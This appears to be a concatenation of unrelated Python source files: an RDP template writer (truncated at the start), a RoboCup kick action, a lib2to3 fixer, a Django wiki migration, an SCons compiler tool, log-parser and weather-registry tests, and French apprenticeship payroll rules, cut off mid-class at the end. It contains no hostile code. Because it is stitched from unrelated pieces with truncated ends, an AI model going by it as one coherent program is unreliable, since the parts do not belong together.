bitmapcachepersistenable:i:1
full address:s:{ip}
audiomode:i:0
redirectprinters:i:1
redirectcomports:i:0
redirectsmartcards:i:1
redirectclipboard:i:1
redirectposdevices:i:0
autoreconnection enabled:i:1
authentication level:i:2
prompt for credentials:i:0
negotiate security layer:i:1
remoteapplicationmode:i:0
alternate shell:s:
shell working directory:s:
gatewayhostname:s:
gatewayusagemethod:i:4
gatewaycredentialssource:i:4
gatewayprofileusagemethod:i:0
promptcredentialonce:i:0
gatewaybrokeringtype:i:0
use redirection server name:i:0
rdgiskdcproxy:i:0
kdcproxyname:s:
"""
import getpass
username = getpass.getuser()
context = {
"ip":line[2],
"nuser":username
}
t.write(template.format(**context))
log("Written template")
t.close()
|
# Under MIT license, see LICENSE.txt
import numpy as np
from .Action import Action
from RULEngine.Util.constant import PLAYER_PER_TEAM, KICK_MAX_SPD
from ai.Util.ai_command import AICommand, AICommandType
from RULEngine.Util.Pose import Pose
from RULEngine.Util.Position import Position
class Kick(Action):
"""
Action Kick: Actionne le kick du robot
Méthodes :
exec(self): Retourne la position actuelle et une force de kick
Attributs (en plus de ceux de Action):
player_id : L'identifiant du joueur qui doit frapper la balle
"""
def __init__(self, p_game_state, p_player_id, p_force, target=Pose()):
"""
:param p_game_state: L'état courant du jeu.
:param p_player_id: Identifiant du joueur qui frappe la balle
:param p_force: force du kicker (float entre 0 et 1)
"""
Action.__init__(self, p_game_state)
assert(isinstance(p_player_id, int))
assert PLAYER_PER_TEAM >= p_player_id >= 0
assert(isinstance(p_force, (int, float)))
assert(KICK_MAX_SPD >= p_force >= 0)
self.player_id = p_player_id
self.force = p_force
self.target = target
self.speed_pose = Pose()
def exec(self):
"""
Execute le kick
:return: Un tuple (Pose, kick)
où Pose est la destination actuelle du joueur (ne pas la modifier)
kick est un float entre 0 et 1 qui determine la force du kick
"""
target = self.target.position.conv_2_np()
player = self.game_state.game.friends.players[self.player_id].pose.position.conv_2_np()
player_to_target = target - player
player_to_target = 0.3 * player_to_target / np.linalg.norm(player_to_target)
self.speed_pose = Pose(Position.from_np(player_to_target))
return AICommand(self.player_id, AICommandType.MOVE, **{"pose_goal": self.speed_pose,
"speed_flag": True,
"kick": True,
"kick_strength": self.force})
|
"""
Optional fixer to transform set() calls to set literals.
"""
# Author: Benjamin Peterson
from lib2to3 import fixer_base, pytree
from lib2to3.fixer_util import token, syms
class FixSetLiteral(fixer_base.BaseFix):
BM_compatible = True
explicit = True
PATTERN = """power< 'set' trailer< '('
(atom=atom< '[' (items=listmaker< any ((',' any)* [',']) >
|
single=any) ']' >
|
atom< '(' items=testlist_gexp< any ((',' any)* [',']) > ')' >
)
')' > >
"""
def transform(self, node, results):
single = results.get("single")
if single:
# Make a fake listmaker
fake = pytree.Node(syms.listmaker, [single.clone()])
single.replace(fake)
items = fake
else:
items = results["items"]
# Build the contents of the literal
literal = [pytree.Leaf(token.LBRACE, "{")]
literal.extend(n.clone() for n in items.children)
literal.append(pytree.Leaf(token.RBRACE, "}"))
# Set the prefix of the right brace to that of the ')' or ']'
literal[-1].prefix = items.next_sibling.prefix
maker = pytree.Node(syms.dictsetmaker, literal)
maker.prefix = node.prefix
# If the original was a one tuple, we need to remove the extra comma.
if len(maker.children) == 4:
n = maker.children[2]
n.remove()
maker.children[-1].prefix = n.prefix
# Finally, replace the set call with our shiny new literal.
return maker
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import mptt.fields
from django.conf import settings
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('sites', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0001_initial'),
('auth', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Article',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('created', models.DateTimeField(verbose_name='created', auto_now_add=True)),
('modified', models.DateTimeField(verbose_name='modified', auto_now=True, help_text='Article properties last modified')),
('group_read', models.BooleanField(default=True, verbose_name='group read access')),
('group_write', models.BooleanField(default=True, verbose_name='group write access')),
('other_read', models.BooleanField(default=True, verbose_name='others read access')),
('other_write', models.BooleanField(default=True, verbose_name='others write access')),
],
options={
'permissions': (('moderate', 'Can edit all articles and lock/unlock/restore'), ('assign', 'Can change ownership of any article'), ('grant', 'Can assign permissions to other users')),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ArticleForObject',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('object_id', models.PositiveIntegerField(verbose_name='object ID')),
('is_mptt', models.BooleanField(default=False, editable=False)),
('article', models.ForeignKey(to='wiki.Article')),
('content_type', models.ForeignKey(related_name='content_type_set_for_articleforobject', verbose_name='content type', to='contenttypes.ContentType')),
],
options={
'verbose_name_plural': 'Articles for object',
'verbose_name': 'Article for object',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ArticlePlugin',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('deleted', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ArticleRevision',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('revision_number', models.IntegerField(verbose_name='revision number', editable=False)),
('user_message', models.TextField(blank=True)),
('automatic_log', models.TextField(blank=True, editable=False)),
('ip_address', models.IPAddressField(null=True, verbose_name='IP address', blank=True, editable=False)),
('modified', models.DateTimeField(auto_now=True)),
('created', models.DateTimeField(auto_now_add=True)),
('deleted', models.BooleanField(default=False, verbose_name='deleted')),
('locked', models.BooleanField(default=False, verbose_name='locked')),
('content', models.TextField(blank=True, verbose_name='article contents')),
('title', models.CharField(max_length=512, verbose_name='article title', help_text='Each revision contains a title field that must be filled out, even if the title has not changed')),
('article', models.ForeignKey(to='wiki.Article', verbose_name='article')),
('previous_revision', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, blank=True, to='wiki.ArticleRevision')),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, blank=True, to=settings.AUTH_USER_MODEL, verbose_name='user')),
],
options={
'get_latest_by': 'revision_number',
'ordering': ('created',),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ReusablePlugin',
fields=[
('articleplugin_ptr', models.OneToOneField(primary_key=True, parent_link=True, to='wiki.ArticlePlugin', serialize=False, auto_created=True)),
('articles', models.ManyToManyField(related_name='shared_plugins_set', to='wiki.Article')),
],
options={
},
bases=('wiki.articleplugin',),
),
migrations.CreateModel(
name='RevisionPlugin',
fields=[
('articleplugin_ptr', models.OneToOneField(primary_key=True, parent_link=True, to='wiki.ArticlePlugin', serialize=False, auto_created=True)),
],
options={
},
bases=('wiki.articleplugin',),
),
migrations.CreateModel(
name='RevisionPluginRevision',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('revision_number', models.IntegerField(verbose_name='revision number', editable=False)),
('user_message', models.TextField(blank=True)),
('automatic_log', models.TextField(blank=True, editable=False)),
('ip_address', models.IPAddressField(null=True, verbose_name='IP address', blank=True, editable=False)),
('modified', models.DateTimeField(auto_now=True)),
('created', models.DateTimeField(auto_now_add=True)),
('deleted', models.BooleanField(default=False, verbose_name='deleted')),
('locked', models.BooleanField(default=False, verbose_name='locked')),
('plugin', models.ForeignKey(related_name='revision_set', to='wiki.RevisionPlugin')),
('previous_revision', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, blank=True, to='wiki.RevisionPluginRevision')),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, blank=True, to=settings.AUTH_USER_MODEL, verbose_name='user')),
],
options={
'get_latest_by': 'revision_number',
'ordering': ('-created',),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='SimplePlugin',
fields=[
('articleplugin_ptr', models.OneToOneField(primary_key=True, parent_link=True, to='wiki.ArticlePlugin', serialize=False, auto_created=True)),
('article_revision', models.ForeignKey(to='wiki.ArticleRevision')),
],
options={
},
bases=('wiki.articleplugin',),
),
migrations.CreateModel(
name='URLPath',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('slug', models.SlugField(null=True, blank=True, verbose_name='slug')),
('lft', models.PositiveIntegerField(db_index=True, editable=False)),
('rght', models.PositiveIntegerField(db_index=True, editable=False)),
('tree_id', models.PositiveIntegerField(db_index=True, editable=False)),
('level', models.PositiveIntegerField(db_index=True, editable=False)),
('article', models.ForeignKey(editable=False, to='wiki.Article', verbose_name='Cache lookup value for articles')),
('parent', mptt.fields.TreeForeignKey(related_name='children', null=True, blank=True, to='wiki.URLPath')),
('site', models.ForeignKey(to='sites.Site')),
],
options={
'verbose_name_plural': 'URL paths',
'verbose_name': 'URL path',
},
bases=(models.Model,),
),
migrations.AlterUniqueTogether(
name='urlpath',
unique_together=set([('site', 'parent', 'slug')]),
),
migrations.AddField(
model_name='revisionplugin',
name='current_revision',
field=models.OneToOneField(related_name='plugin_set', null=True, help_text='The revision being displayed for this plugin. If you need to do a roll-back, simply change the value of this field.', blank=True, to='wiki.RevisionPluginRevision', verbose_name='current revision'),
preserve_default=True,
),
migrations.AlterUniqueTogether(
name='articlerevision',
unique_together=set([('article', 'revision_number')]),
),
migrations.AddField(
model_name='articleplugin',
name='article',
field=models.ForeignKey(to='wiki.Article', verbose_name='article'),
preserve_default=True,
),
migrations.AlterUniqueTogether(
name='articleforobject',
unique_together=set([('content_type', 'object_id')]),
),
migrations.AddField(
model_name='article',
name='current_revision',
field=models.OneToOneField(related_name='current_set', null=True, help_text='The revision being displayed for this article. If you need to do a roll-back, simply change the value of this field.', blank=True, to='wiki.ArticleRevision', verbose_name='current revision'),
preserve_default=True,
),
migrations.AddField(
model_name='article',
name='group',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, help_text='Like in a UNIX file system, permissions can be given to a user according to group membership. Groups are handled through the Django auth system.', blank=True, to='auth.Group', verbose_name='group'),
preserve_default=True,
),
migrations.AddField(
model_name='article',
name='owner',
field=models.ForeignKey(related_name='owned_articles', null=True, on_delete=django.db.models.deletion.SET_NULL, help_text='The owner of the article, usually the creator. The owner always has both read and write access.', blank=True, to=settings.AUTH_USER_MODEL, verbose_name='owner'),
preserve_default=True,
),
]
|
"""SCons.Tool.cc
Tool-specific initialization for generic Posix C compilers.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/cc.py 2013/03/03 09:48:35 garyo"
import SCons.Tool
import SCons.Defaults
import SCons.Util
CSuffixes = ['.c', '.m']
if not SCons.Util.case_sensitive_suffixes('.c', '.C'):
CSuffixes.append('.C')
def add_common_cc_variables(env):
"""
Add underlying common "C compiler" variables that
are used by multiple tools (specifically, c++).
"""
if '_CCCOMCOM' not in env:
env['_CCCOMCOM'] = '$CPPFLAGS $_CPPDEFFLAGS $_CPPINCFLAGS'
# It's a hack to test for darwin here, but the alternative
# of creating an applecc.py to contain this seems overkill.
# Maybe someday the Apple platform will require more setup and
# this logic will be moved.
env['FRAMEWORKS'] = SCons.Util.CLVar('')
env['FRAMEWORKPATH'] = SCons.Util.CLVar('')
if env['PLATFORM'] == 'darwin':
env['_CCCOMCOM'] = env['_CCCOMCOM'] + ' $_FRAMEWORKPATH'
if 'CCFLAGS' not in env:
env['CCFLAGS'] = SCons.Util.CLVar('')
if 'SHCCFLAGS' not in env:
env['SHCCFLAGS'] = SCons.Util.CLVar('$CCFLAGS')
def generate(env):
"""
Add Builders and construction variables for C compilers to an Environment.
"""
static_obj, shared_obj = SCons.Tool.createObjBuilders(env)
for suffix in CSuffixes:
static_obj.add_action(suffix, SCons.Defaults.CAction)
shared_obj.add_action(suffix, SCons.Defaults.ShCAction)
static_obj.add_emitter(suffix, SCons.Defaults.StaticObjectEmitter)
shared_obj.add_emitter(suffix, SCons.Defaults.SharedObjectEmitter)
add_common_cc_variables(env)
env['CC'] = 'cc'
env['CFLAGS'] = SCons.Util.CLVar('')
env['CCCOM'] = '$CC -o $TARGET -c $CFLAGS $CCFLAGS $_CCCOMCOM $SOURCES'
env['SHCC'] = '$CC'
env['SHCFLAGS'] = SCons.Util.CLVar('$CFLAGS')
env['SHCCCOM'] = '$SHCC -o $TARGET -c $SHCFLAGS $SHCCFLAGS $_CCCOMCOM $SOURCES'
env['CPPDEFPREFIX'] = '-D'
env['CPPDEFSUFFIX'] = ''
env['INCPREFIX'] = '-I'
env['INCSUFFIX'] = ''
env['SHOBJSUFFIX'] = '.os'
env['STATIC_AND_SHARED_OBJECTS_ARE_THE_SAME'] = 0
env['CFILESUFFIX'] = '.c'
def exists(env):
return env.Detect('cc')
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
from insights.parsers.cinder_log import CinderApiLog, CinderVolumeLog
from insights.tests import context_wrap
from datetime import datetime
api_log = """
2019-04-16 21:01:02.072 21 INFO cinder.api.openstack.wsgi [req-e7b42a20-4109-45b7-b18a-ae5ad4831909 - - - - -] OPTIONS http://controller-0.internalapi.localdomain/
2019-04-16 21:01:02.073 21 DEBUG cinder.api.openstack.wsgi [req-e7b42a20-4109-45b7-b18a-ae5ad4831909 - - - - -] Empty body provided in request get_body /usr/lib/python2.7/site-packages/cinder/api/openstack/wsgi.py:718
2019-04-16 21:01:02.073 21 DEBUG cinder.api.openstack.wsgi [req-e7b42a20-4109-45b7-b18a-ae5ad4831909 - - - - -] Calling method '<bound method VersionsController.all of <cinder.api.versions.VersionsController object at 0x7f44fe7ee1d0>>' _process_stack /usr/lib/python2.7/site-packages/cinder/api/openstack/wsgi.py:871
2019-04-16 21:01:02.074 21 INFO cinder.api.openstack.wsgi [req-e7b42a20-4109-45b7-b18a-ae5ad4831909 - - - - -] http://controller-0.internalapi.localdomain/ returned with HTTP 300
2019-04-16 21:01:04.079 22 INFO cinder.api.openstack.wsgi [req-43db684e-f4eb-4b23-9f8e-82beb95ab0b7 - - - - -] OPTIONS http://controller-0.internalapi.localdomain/
"""
CINDER_LOG = """
2015-06-19 07:31:41.020 7947 DEBUG cinder.openstack.common.periodic_task [-] Running periodic task VolumeManager._publish_service_capabilities run_periodic_tasks /usr/lib/python2.7/site-packages/cinder/openstack/common/periodic_task.py:178
2015-06-19 07:31:41.022 7947 DEBUG cinder.manager [-] Notifying Schedulers of capabilities ... _publish_service_capabilities /usr/lib/python2.7/site-packages/cinder/manager.py:128
2015-06-19 07:31:41.025 7947 DEBUG cinder.openstack.common.periodic_task [-] Running periodic task VolumeManager._report_driver_status run_periodic_tasks /usr/lib/python2.7/site-packages/cinder/openstack/common/periodic_task.py:178
2015-06-19 07:31:41.026 7947 INFO cinder.volume.manager [-] Updating volume status
2015-11-27 11:22:45.416 16656 INFO oslo.messaging._drivers.impl_rabbit [-] Connecting to AMQP server on 169.254.10.22:5672
2015-11-27 11:22:45.426 16656 INFO oslo.messaging._drivers.impl_rabbit [-] Connected to AMQP server on 169.254.10.22:5672
2015-11-27 11:23:07.146 16656 INFO cinder.volume.manager [req-a8c22cdb-e21b-497f-affe-9380478decae - - - - -] Updating volume status
2015-11-27 11:23:07.148 16656 WARNING cinder.volume.manager [req-a8c22cdb-e21b-497f-affe-9380478decae - - - - -] Unable to update stats, LVMISCSIDriver -2.0.0 (config name rbd) driver is uninitialized.
"""
def test_cinder_api_log():
log = CinderApiLog(context_wrap(api_log))
assert len(log.get(["req-"])) == 5
assert len(log.get("e7b42a20-4109-45b7-b18a-ae5ad4831909")) == 4
assert len(list(log.get_after(datetime(2019, 4, 16, 21, 0, 0)))) == 5
def test_get_cinder_log():
log = CinderVolumeLog(context_wrap(CINDER_LOG))
assert len(log.lines) == 8
assert sorted([i['raw_message'] for i in log.get('cinder.volume.manager')]) == sorted([
'2015-06-19 07:31:41.026 7947 INFO cinder.volume.manager [-] Updating volume status',
'2015-11-27 11:23:07.146 16656 INFO cinder.volume.manager [req-a8c22cdb-e21b-497f-affe-9380478decae - - - - -] Updating volume status',
'2015-11-27 11:23:07.148 16656 WARNING cinder.volume.manager [req-a8c22cdb-e21b-497f-affe-9380478decae - - - - -] Unable to update stats, LVMISCSIDriver -2.0.0 (config name rbd) driver is uninitialized.',
])
assert sorted([i['raw_message'] for i in list(log.get_after(datetime(2015, 11, 27, 11, 23, 0)))]) == sorted([
'2015-11-27 11:23:07.146 16656 INFO cinder.volume.manager [req-a8c22cdb-e21b-497f-affe-9380478decae - - - - -] Updating volume status',
'2015-11-27 11:23:07.148 16656 WARNING cinder.volume.manager [req-a8c22cdb-e21b-497f-affe-9380478decae - - - - -] Unable to update stats, LVMISCSIDriver -2.0.0 (config name rbd) driver is uninitialized.',
])
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import unittest
from os import sep
from pyowm.commons.cityidregistry import CityIDRegistry
from pyowm.weatherapi25.location import Location
class TestCityIDRegistryReadsFS(unittest.TestCase):
_prefix = 'cityids'+sep
_instance = CityIDRegistry(_prefix+'%03d-%03d.txt.bz2')
def test_assess_subfile_from(self):
self.assertEqual(self._instance._assess_subfile_from('b-city'),
self._prefix+'097-102.txt.bz2')
self.assertEqual(self._instance._assess_subfile_from('h-city'),
self._prefix+'103-108.txt.bz2')
self.assertEqual(self._instance._assess_subfile_from('n-city'),
self._prefix+'109-114.txt.bz2')
self.assertEqual(self._instance._assess_subfile_from('t-city'),
self._prefix+'115-122.txt.bz2')
self.assertRaises(ValueError, CityIDRegistry._assess_subfile_from,
self._instance, '123abc')
self.assertRaises(ValueError, CityIDRegistry._assess_subfile_from,
self._instance, '{abc')
def test_lookup_line_by_city_name(self):
expected = u'Dongen,2756723,51.626671,4.93889,NL'
self.assertEqual(expected,
self._instance._lookup_line_by_city_name('dongen'))
self.assertTrue(self._instance. \
_lookup_line_by_city_name('aaaaaaaa') is None)
def test_ids_for(self):
self.assertEqual([(2756723, 'Dongen', 'NL')], self._instance.ids_for('dongen'))
self.assertEqual([], self._instance.ids_for('aaaaaaaaaa'))
def test_ids_for_fails_with_malformed_inputs(self):
self.assertRaises(ValueError, CityIDRegistry.ids_for, self._instance, '123abc')
def test_locations_for(self):
expected = Location('Dongen', 4.938890, 51.626671, 2756723, 'NL')
result_list = self._instance.locations_for('dongen')
self.assertEqual(1, len(result_list))
result = result_list[0]
self.assertEqual(result.name, expected.name)
self.assertEqual(result.country, expected.country)
self.assertEqual(result.id, expected.id)
self.assertEqual(result.lat, expected.lat)
self.assertEqual(result.lon, expected.lon)
self.assertEqual([], self._instance.locations_for('aaaaaaaaaa'))
def test_locations_for_fails_with_malformed_inputs(self):
self.assertRaises(ValueError, CityIDRegistry.locations_for, self._instance, '123abc')
def test_ids_for_more_cases(self):
result = self._instance.ids_for("bologna", matching='exact')
self.assertEqual(0, len(result))
result = self._instance.ids_for("Abbans-Dessus")
self.assertEqual(2, len(result))
self.assertTrue((3038800, 'Abbans-Dessus', 'FR') in result)
self.assertTrue((6452202, 'Abbans-Dessus', 'FR') in result)
result = self._instance.ids_for("Dessus", matching='like')
self.assertEqual(6, len(result))
def test_locations_for_more_cases(self):
expected1 = Location('Abbans-Dessus', 5.88188, 47.120548, 3038800, 'FR')
expected2 = Location('Abbans-Dessus', 5.88333, 47.116669, 6452202, 'FR')
result = self._instance.locations_for("Abbans-Dessus")
self.assertEqual(2, len(result))
for l in result:
self.assertTrue(isinstance(l, Location))
self.assertTrue(l.id in [expected1.id, expected2.id])
if __name__ == "__main__":
unittest.main()
|
# -*- coding: utf-8 -*-
from __future__ import division
from numpy import datetime64, timedelta64
from ....base import * # noqa analysis:ignore
class apprenti(Variable):
column = BoolCol
entity_class = Individus
label = u"L'individu est apprenti"
url = "http://www.apce.com/pid927/contrat-d-apprentissage.html?espace=1&tp=1&pagination=2"
def function(self, simulation, period):
period = period.this_month
age = simulation.calculate('age', period)
age_condition = (16 <= age) * (age < 25)
apprentissage_contrat_debut = simulation.calculate('apprentissage_contrat_debut', period)
duree_contrat = (
datetime64(period.start) + timedelta64(1, 'D') - apprentissage_contrat_debut
).astype('timedelta64[Y]')
anciennete_contrat = (duree_contrat < timedelta64(3, 'Y'))
return period, age_condition * anciennete_contrat
class remuneration_apprenti(Variable):
column = FloatCol
entity_class = Individus
label = u"Rémunération de l'apprenti"
url = "http://www.apce.com/pid927/contrat-d-apprentissage.html?espace=1&tp=1&pagination=2"
# Aux jeunes de 16 à 25 ans (exceptionnellement 15 ans, s'ils ont effectué la scolarité du premier cycle de
# l'enseignement secondaire, ou, s'ils suivent une "formation apprentissage junior").
#
# Depuis le 30 juillet 2011, il est possible pour un jeune mineur ayant 15 ans au cours de l'année civile, de
# souscrire un contrat d'apprentissage s'il justifie avoir accompli la scolarité du premier cycle de l'enseignement
# secondaire, ou avoir suivi une formation dans le cadre du dispositif d'initiation aux métiers en
# alternance (DIMA).
def function(self, simulation, period):
period = period.this_month
age = simulation.calculate('age', period)
apprentissage_contrat_debut = simulation.calculate('apprentissage_contrat_debut', period)
smic = simulation.legislation_at(period.start).cotsoc.gen.smic_h_b * 52 * 35 / 12
anciennete_contrat = (
datetime64(period.start) + timedelta64(1, 'D') - apprentissage_contrat_debut
).astype('timedelta64[Y]')
apprenti = simulation.calculate('apprenti', period)
salaire_en_smic = [ # TODO: move to parameters
dict(
part_de_smic_by_anciennete = {
1: .25,
2: .41,
3: .53,
},
age_min = 15,
age_max = 18,
),
dict(
part_de_smic_by_anciennete = {
1: .37,
2: .49,
3: .61,
},
age_min = 18,
age_max = 21,
),
dict(
part_de_smic_by_anciennete = {
1: .53,
2: .65,
3: .78,
},
age_min = 21,
age_max = 99
)
]
output = age * 0.0
for age_interval in salaire_en_smic:
age_condition = (age_interval["age_min"] <= age) * (age < age_interval["age_max"])
output[age_condition] = sum([
(anciennete_contrat[age_condition] == timedelta64(anciennete, 'Y')) * part_de_smic
for anciennete, part_de_smic in age_interval['part_de_smic_by_anciennete'].iteritems()
])
return period, output * smic * apprenti
class exoneration_cotisations_employeur_apprenti(Variable):
column = FloatCol
entity_class = Individus
label = u"Exonération de cotisations employeur pour l'emploi d'un apprenti"
url = "http://www.apce.com/pid927/contrat-d-apprentissage.html?espace=1&tp=1&pagination=2"
# Artisans et employeurs de moins de 11 salariés
#
# - exonération totale (part patronale et salariale) des charges sociales,
# - sauf : cotisation sociale patronale d'accidents du travail et des maladies professionnelles, cotisation
# supplémentaire accidents du travail et cotisation supplémentaire de retraite complémentaire (c'est-à-dire
# dépassant le taux minimum obligatoire).
#
# Autres entreprises
#
# - exonération totale (part patronale et salariale) des cotisations de sécurité sociale
# (maladie-veuvage-vieillesse) et d'allocations familiales,
# - exonération des autres cotisations sociales salariales,
# - restent donc dues par l'employeur : les cotisations supplémentaires d'accidents du travail, la part patronale
# des cotisations d'accidents du travail et de maladies professionnelles, de retraite complémentaire, d'assurance
# chômage et d'AGFF, le versement transport ainsi que les cotisations Fnal.
# Précision : le décompte de l'effectif des entreprises non artisanales s'apprécie au 31 décembre précédant la date
# de conclusion du contrat d'apprentissage.
def function(self, simulation, period):
period = period.this_month
accident_du_travail = simulation.calculate('accident_du_travail', period)
apprenti = simulation.calculate('apprenti', period)
cotisations_employeur = simulation.calculate('cotisations_employeur', period)
effectif_entreprise = simulation.calculate('effectif_entreprise', period)
famille = simulation.calculate('famille', period)
mmid_employeur = simulation.calculate('mmid_employeur', period)
vieillesse_deplafonnee_employeur = simulation.calculate('vieillesse_deplafonnee_employeur', period)
vieillesse_plafonnee_employeur = simulation.calculate('vieillesse_plafonnee_employeur', period)
cotisations_non_exonerees = accident_du_travail
exoneration_moins_11 = cotisations_non_exonerees - cotisations_employeur
cotisations_exonerees = (famille + mmid_employeur + vieillesse_plafonnee_employeur +
vieillesse_deplafonnee_employeur)
exoneration_plus_11 = -cotisations_exonerees
return period, (
exoneration_plus_11 * (effectif_entreprise >= 11) +
exoneration_moins_11 * (effectif_entreprise < 11)
) * apprenti
class exoneration_cotisations_salariales_apprenti(Variable):
column = FloatCol
entity_class = Individus
label = u"Exonération de cotisations salariales pour l'emploi d'un apprenti"
url = "http://www.apce.com/pid927/contrat-d-apprentissage.html?espace=1&tp=1&pagination=2"
def function(self, simulation, period):
period = period.this_month
apprenti = simulation.calculate('apprenti', period)
cotisations_salariales_contributives = simulation.calculate('cotisations_salariales_contributives', period)
cotisations_salariales_non_contributives = simulation.calculate(
'cotisations_salariales_non_contributives', period)
return period, - (cotisations_salariales_contributives + cotisations_salariales_non_contributives) * apprenti
class prime_apprentissage(Variable):
column = FloatCol
entity_class = Individus
label = u"Prime d'apprentissage pour les entreprise employant un apprenti"
url = "http://www.apce.com/pid927/contrat-d-apprentissage.html?espace=1&tp=1&pagination=2"
# L'employeur peut également recevoir de la région dans laquelle est situé l'établissement du lieu de travail,
# une prime d'apprentissage.
#
# Les conditions d'attribution de cette aide sont fixées par chaque région (ou pour la Corse, par la collectivité
# territoriale de Corse) après avis du comité de coordination régional de l'emploi et de la formation
# professionnelle en tenant compte notamment de l'ensemble de l'effort de l'employeur dans le domaine de
# l'apprentissage, de la durée de la formation et des objectifs de développement de la formation professionnelle
# des jeunes sur le territoire de la région (ou de la collectivité territoriale de Corse).
#
# Son montant est au minimum de 1 000 euros par année de cycle de formation.
# nouveau. Depuis le 1er janvier 2014 , cette aide n'est versée qu'aux entreprises de moins de 11 salariés.
#
# Son versement est subordonné à la condition que l'embauche de l'apprenti soit confirmée à l'issue des deux
# premiers mois de l'apprentissage.
#
# Son versement cesse lorsque l'apprenti n'est plus salarié dans l'entreprise ou l'établissement qui l'a embauché.
def function(self, simulation, period):
period = period.this_year
apprenti = simulation.calculate('apprenti', period)
return period, 1000 * apprenti
# # class credit_impot_emploi_apprenti(Variable):
# column = FloatCol
# entity_class = Individus
# label = u" Crédit d'impôt pour l'emploi d'apprentis"
# url = "http://www.apce.com/pid927/contrat-d-apprentissage.html?espace=1&tp=1&pagination=2"
#
# def function(self, simulation, period):
# pass
# # Cet avantage fiscal est réservé aux entreprises imposées selon un régime d'imposition du réel.
# # Précision : les entreprises exonérées d'impôt sur les bénéfices au titre des entreprises nouvelles, d'une
# # implantation en zone franche urbaine, du statut de jeune entreprise innovante ou d'une implantation en Corse
# # peuvent également en bénéficier.
# #
# # Le crédit d'impôt est égal au nombre moyen d'apprentis dont le contrat de travail a atteint une durée d'au moins
# # 1 mois au cours de l'année civile multiplié par :
# # - 1 600 €,
# # - ou 2 200€ si l'apprenti est reconnu travailleur handicapé et qu'il bénéficie d'un accompagnement personnalisé,
# # ou si l'apprenti est employé par une entreprise portant le label "Entreprise du patrimoine vivant", ou s'il est
# # recruté dans le cadre d'une "formation apprentissage junior".
# #
# # L'avantage fiscal est plafonné au montant des dépenses de personnel afférentes aux apprentis minoré des
# # subventions perçues en contrepartie de leur embauche.
# # class credit_impot_emploi_apprenti(Variable):
# column = FloatCol
# entity_class = Individus
# label = u"Déduction de la créance "bonus alternant"
# Les entreprises de plus de 250 salariés, tous établissements confondus, redevables de la taxe d'apprentissage,
# qui emploient plus de 4 % de jeunes en apprentissage (5 % pour la taxe payable en 2016 au titre de 2015), dans la
# limite de 6 % d'alternants, peuvent bénéficier d'une créance à déduire du hors quota de la taxe d'apprentissage (TA).
# Les entreprises concernées doivent calculer elles-mêmes le montant de la créance à déduire de leur TA.
# Son montant est calculé selon la formule suivante : pourcentage d'alternants ouvrant droit à l'aide x effectif annuel
# moyen de l'entreprise au 31 décembre de l'année précédente x un montant forfaitaire de 400 € par alternant.
# Par exemple, une entreprise de 300 salariés employant 6 % de salariés en alternance, ce qui porte le nombre
# d'alternants ouvrant droit à l'aide à 2 % (6 % - 4 %), peut bénéficier d'une prime de : 2 % x 300 x 400 = 2 400 €.
|
# -*- coding: utf-8 -*-
# Copyright (c) 2015 Metaswitch Networks
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
felix.splitter
~~~~~~~~~~~~~
Simple object that just splits notifications out for IPv4 and IPv6.
"""
import functools
import logging
import gevent
from calico.felix.actor import Actor, actor_message
_log = logging.getLogger(__name__)
class UpdateSplitter(Actor):
"""
